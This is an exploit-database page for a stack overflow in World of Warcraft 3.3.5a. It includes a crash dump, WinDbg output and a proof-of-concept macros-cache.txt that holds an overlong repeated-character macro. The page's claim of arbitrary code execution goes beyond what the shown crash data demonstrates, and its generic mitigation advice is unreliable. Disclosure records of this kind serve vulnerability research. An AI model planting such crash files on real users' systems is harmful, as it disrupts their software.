World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)

vendor:

World of Warcraft

by:

Alireza Chegini

7,8

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: World of Warcraft

Affected Version From: 3.3.5a

Affected Version To: 3.3.5a

Patch Exists: NO

Related CWE: N/A

CPE: a:blizzard_entertainment:world_of_warcraft

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7

2014

World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)

A stack overflow vulnerability exists in World of Warcraft 3.3.5a, which allows an attacker to execute arbitrary code by creating a malicious macros-cache.txt file in the WTF/Account/[AccountName] directory. The attacker can then use this file to execute arbitrary code on the target system.

Mitigation:

Ensure that all users have the least privilege necessary to perform their job functions. Ensure that all users are aware of the potential risks of macros and other executable content, and are trained to recognize and report suspicious activity.

Source

Exploit-DB raw data:

# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)
# Date: 21 Jul 2014
# Exploit Author: Alireza Chegini (@nimaarek)
# Vendor Homepage: http://us.battle.net/wow/
# Version: 3.3.5a
# Tested on: Win7

Output:

--WoWError [CrashDUmp] :
World of WarCraft (build 12340)

Exe:      D:\Wow\Wow.exe
Time:     Jul 21, 2014  6:10:08.243 PM
User:     nimaarek
Computer: NIMAAREK-L
------------------------------------------------------------------------------

This application has encountered a critical error:

ERROR #132 (0x85100084) Fatal Exception
Program:	D:\Wow\Wow.exe
Exception:	0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77

--Windbg result:
0:020> g
ModLoad: 6c670000 6c6a0000   C:\Windows\SysWOW64\wdmaud.drv
ModLoad: 6d3a0000 6d3a4000   C:\Windows\SysWOW64\ksuser.dll
ModLoad: 6c660000 6c667000   C:\Windows\SysWOW64\AVRT.dll
ModLoad: 6c610000 6c618000   C:\Windows\SysWOW64\msacm32.drv
ModLoad: 6c600000 6c607000   C:\Windows\SysWOW64\midimap.dll
ModLoad: 71e50000 71e66000   C:\Windows\SysWOW64\CRYPTSP.dll
ModLoad: 71e10000 71e4b000   C:\Windows\SysWOW64\rsaenh.dll
(3a8.470): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Wow.exe - 
eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000
eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Wow+0xbb77:
0040bb77 8500            test    dword ptr [eax],eax  ds:002b:02af2000=00000000
==============================================================================
Poc :
%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt

MACRO 1 "Decursive" INV_Misc_QuestionMark
/stopcasting
/cast [target=mouseover,nomod,exists] Dispel Magic;  [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic
END
MACRO 2 "PoC" INV_Misc_QuestionMark
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-)
END
==============================================================================
Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]